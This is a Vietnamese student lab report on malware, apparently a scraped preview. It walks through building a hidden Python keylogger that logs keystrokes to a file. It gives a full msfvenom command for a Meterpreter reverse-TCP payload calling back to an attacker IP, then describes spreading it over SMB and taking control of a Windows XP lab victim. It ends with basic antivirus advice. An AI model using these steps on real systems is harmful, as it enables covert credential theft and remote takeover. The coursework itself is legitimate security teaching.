Báo cáo thực hanfhv lab06 malware phần 1 keylogger

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (2.59 MB, 14 trang )

<span class="text_page_counter">Trang 2</span><div class="page_container" data-page="2">

<b>PHẦN 1: KEYLOGGER</b>

<b>* Định nghĩa: Là một loại phần mềm hoặc thiết bị giám sát và ghi lại mọi phím được ấn trên bàn</b>

phím của máy tính mà nó được cài đặt. Mục đích chính của keylogger là theo dõi hoặc đánh cắp thông tin mà người dùng nhập vào máy tính mà khơng được họ biết. Keylogger có thể sử dụng với các mục đích hợp pháp như việc theo dõi hoạt động của con cái hoặc nhân viên trong môi trường công việc. Tuy nhiên, chúng cũng có thể được sử dụng bởi tin tặc hoặc người xấu để đánh cắp thông tin cá nhân, mật khẩu, thông tin tài khoản ngân hàng, và nhiều thông tin quan trọng khác

<b>* Thực hành: Xây dựng phần mềm theo dõi thao tác của người dùng trên bàn phím, từ đó</b>

đánh cắp thơng tin mà người dùng nhập qua bàn phím.

Bước 1: Trong ổ đĩa C tạo thư mục hack để giấu phần mềm gián điệp

Bước 2: Sau đó ta sẽ để file giandiep.py vào thư mục vừa tạo Bước 3: Xây dựng file giandiep.py

</div><span class="text_page_counter">Trang 3</span><div class="page_container" data-page="3">

Bước 3.1: Cài đặt thư viện<i>pynput</i>

Bước 3.2: Gọi thư viện gián điệp Listener để theo dõi thao tác của người dùng trên máy ở đây cụ thể là từ bàn phím

Bước 3.3: Xây dựng hàm gián điệp lấy thơng tin các phím được người dùng gõ rồi ghi vào file<i>giandiep.txt</i>

Giải thích:

1. Truyền vào tham số key - là phím trên bàn phím 2. Sau đó ép kiểu thành kiểu string để ghi được vào file .txt 3. Nếu người dùng bấm F10 thì chương trình gián điệp sẽ dừng lại

4. Nếu khơng phải phím F10 thì mở file giandiep.txt rồi ghi vào, nếu file chưa có thì sẽ tạo mới rồi ghi thêm vào (tham số ‘a’ viết tắt của appending), truyền thêm tham

</div><span class="text_page_counter">Trang 4</span><div class="page_container" data-page="4">

số encoding utf-8 để người dùng có nhập Tiếng Việt thì phần mềm cũng hiểu mà ghi vào file

5. Sau đó viết phím key đã ép kiểu vào file, sau đó đóng file Bước 4: Chạy hàm đã định nghĩa

Giải thích:

1. Tạo đối tượng Listener truyền tham số key_press là hàm đã định nghĩa ở trên 2. Dùng phương thức start() để bắt đầu lắng nghe

3. Dùng phương thức join() để duy trì quá trình, cho đến khi q trình hồn thành

</div><span class="text_page_counter">Trang 5</span><div class="page_container" data-page="5">

<b>PHẦN 2: MALWARE</b>

Bước 1: Xem IP của máy Kali và máy Windows XP

Bước 1.1: Vào Command Prompt của Windows XP dùng lệnh<i>ipconfig</i>để định địa chỉ IP của máy Windows XP.

Bước 1.2: Vào Terminal của Kali dùng lệnh<i>ifconfig</i>để định địa chỉ IP của máy Kali.

</div><span class="text_page_counter">Trang 6</span><div class="page_container" data-page="6">

Bước 2: Truy cập vào MSFConsole bằng lệnh<i>msfconsole</i>

</div><span class="text_page_counter">Trang 7</span><div class="page_container" data-page="7">

Bước 3: Tạo virus có tên dev.exe, thực hiện ping kết nối 2 máy

Bước 3.1: Dùng lệnh<i>msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.218.132 LPORT=4444 -f exe > /root/dev.exe. Trong đó:</i>

<i>192.168.218.132</i>là địa chỉ ip của máy tính Attacker,4444là chỉ số port sẽ sử dụng kết nối với máy nạn nhân.

Bước 3.2: Kiểm tra trong file root của Windows XP, mở thư mục root với quyền root, thấy thư mụcdev.exelà virus mình tạo.

</div><span class="text_page_counter">Trang 8</span><div class="page_container" data-page="8">

Bước 4: Phát tán virus

Bước 4.1: Tạo thư mục21110600_NTP

</div><span class="text_page_counter">Trang 9</span><div class="page_container" data-page="9">

Bước 4.2: Cấu hình như sau

Bước 4.3: Máy Attacker, vào smb để chuyển file sang máy nạn nhân

Bước 4.4: Kiểm tra virusdev.exetrong thư mục21110600_NTPtrên Windows XP

</div><span class="text_page_counter">Trang 10</span><div class="page_container" data-page="10">

Bước 5: Khai thác máy nạn nhân

</div><span class="text_page_counter">Trang 11</span><div class="page_container" data-page="11">

Xem lệnh đang chạy bằng cú pháp<i>ps</i>

Tạo thư mục trên máy nạn nhân

</div><span class="text_page_counter">Trang 12</span><div class="page_container" data-page="12">

Tạo user phân quyền trên máy nạn nhân

</div><span class="text_page_counter">Trang 14</span><div class="page_container" data-page="14">

<b>PHÒNG CHỐNG CÁC PHẦN MỀM ĐỘC HẠI</b>

1. Cài đặt chương trình duyệt virus 2. Khơng chạy các chương trình lạ

<b>* Cài đặt chương trình duyệt virus:</b>

Hãy tải và cài đặt một phần mềm diệt virus mạnh mẽ và đáng tin cậy. Các phần mềm diệt virus phổ biến bao gồm Avast, McAfee, Norton, hoặc Bitdefender. Hãy đảm bảo cập nhật thường xuyên để bảo vệ trước các mối đe dọa mới. Thiết lập chương trình diệt virus để qt tồn bộ hệ thống máy tính của bạn và các ổ đĩa cứng định kỳ.

<b>* Không chạy các chương trình lạ:</b>

Hạn chế cài đặt các phần mềm từ nguồn không tin cậy. Chỉ cài đặt phần mềm từ các nguồn đáng tin cậy như trang web chính thức của nhà sản xuất hoặc cửa hàng ứng dụng chính thống.

Tránh mở tệp đính kèm từ email hoặc tin nhắn của người không quen biết. Hãy luôn cập nhật hệ điều hành và các ứng dụng của bạn với phiên bản mới nhất để bảo vệ khỏi các lỗ hổng bảo mật đã được vá.

Sử dụng tường lửa để ngăn chặn các kết nối không mong muốn đến máy tính

</div>